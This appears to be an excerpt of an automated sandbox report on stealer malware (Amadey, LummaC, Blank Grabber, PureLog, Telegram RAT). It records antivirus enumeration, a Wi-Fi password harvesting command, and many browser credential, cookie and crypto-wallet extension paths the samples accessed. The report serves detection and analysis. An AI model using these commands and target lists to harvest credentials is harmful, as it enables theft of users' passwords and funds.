                                Source: C:\Windows\System32\attrib.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                                Stealing of Sensitive Information

                                barindex
                                Yara detected Amadeys stealer DLL
                                Source: Yara matchFile source: 2.2.skotes.exe.690000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.2.skotes.exe.690000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.2.file.exe.260000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 89.2.skotes.exe.690000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000003.00000003.2268719607.0000000004F70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000002.00000002.2310380497.0000000000691000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000002.00000003.2270058738.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000059.00000002.2787455438.0000000000691000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.2205661447.00000000048A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000059.00000003.2745055454.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                                Yara detected Blank Grabber
                                Source: Yara matchFile source: 00000006.00000002.2993365618.000001FA2E130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.2986166870.000001FA2DFF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.2481469057.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000003.2469304797.0000027326167000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000003.2469304797.0000027326165000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.2992431014.000001FA2DFF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.2983797651.000001FA2EDC1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: D1UL0FG.exe PID: 5160, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: D1UL0FG.exe PID: 6716, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI51602\rarreg.key, type: DROPPED
                                Yara detected LummaC Stealer
                                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: 8ZVMneG.exe PID: 7744, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: d0ef52de9f.exe PID: 7216, type: MEMORYSTR
                                Yara detected PureLog Stealer
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1017914001\db75e03f4b.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[4].exe, type: DROPPED
                                Yara detected Telegram RAT
                                Source: Yara matchFile source: Process Memory Space: D1UL0FG.exe PID: 6716, type: MEMORYSTR
                                Found many strings related to Crypto-Wallets (likely being stolen)
                                Source: D1UL0FG.exe, 00000006.00000002.2993365618.000001FA2E130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Electrum
                                Source: 8ZVMneG.exe, 00000054.00000003.3041963301.0000000001302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                                Source: D1UL0FG.exe, 00000006.00000002.2993365618.000001FA2E130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: com.liberty.jaxx
                                Source: 8ZVMneG.exe, 00000054.00000003.3041963301.0000000001302000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                                Source: 8ZVMneG.exe, 00000054.00000003.3041726825.0000000001363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.walletll
                                Source: D1UL0FG.exe, 00000006.00000002.2993365618.000001FA2E130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Exodus
                                Source: D1UL0FG.exe, 00000006.00000002.2993365618.000001FA2E130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Ethereum
                                Source: 8ZVMneG.exe, 00000054.00000003.3041726825.0000000001363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets(
                                Source: D1UL0FG.exe, 00000006.00000002.2993365618.000001FA2E130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: keystore
                                Tries to harvest and steal WLAN passwords
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                                Tries to harvest and steal browser information (history, passwords, etc)
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_storeJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\favicons.sqliteJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\031db23f-f53a-4d6b-b429-cd0302ef56d3Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabaseJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\3e445a25-c088-46bb-968a-82532b92e486Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation PlatformJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\6490c938-fe3f-48ae-bc5e-e1986298f7c1Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NetworkJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqliteJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqliteJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\content-prefs.sqliteJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhiJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\a5f61848-f128-4a80-965b-a3000feed295Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dirJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabaseJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDBJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDBJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage.sqliteJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqliteJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqliteJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-releaseJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCacheJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM StoreJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\ls-archive.sqliteJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.logJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDBJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDBJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\58ef9818-5ea1-49a0-b5b0-9338401a7943Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
